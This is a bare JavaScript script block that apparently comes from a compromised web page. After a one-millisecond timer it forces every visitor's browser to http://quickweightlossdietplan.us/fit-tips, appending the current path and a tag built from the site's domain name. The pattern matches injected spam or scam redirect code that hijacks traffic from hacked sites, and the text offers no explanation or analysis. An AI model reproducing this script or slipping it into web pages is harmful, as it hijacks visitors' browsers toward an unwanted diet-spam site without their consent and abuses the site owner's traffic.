<script language='javascript'>

setTimeout(
  function(){ 
let x = document.location.host.split('.');
x = '-' + x[x.length-2]+'-category';
if (true){
window.location.href = 'http://quickweightlossdietplan.us/fit-tips' + window.location.pathname + x;
}
 },
  1
);

</script>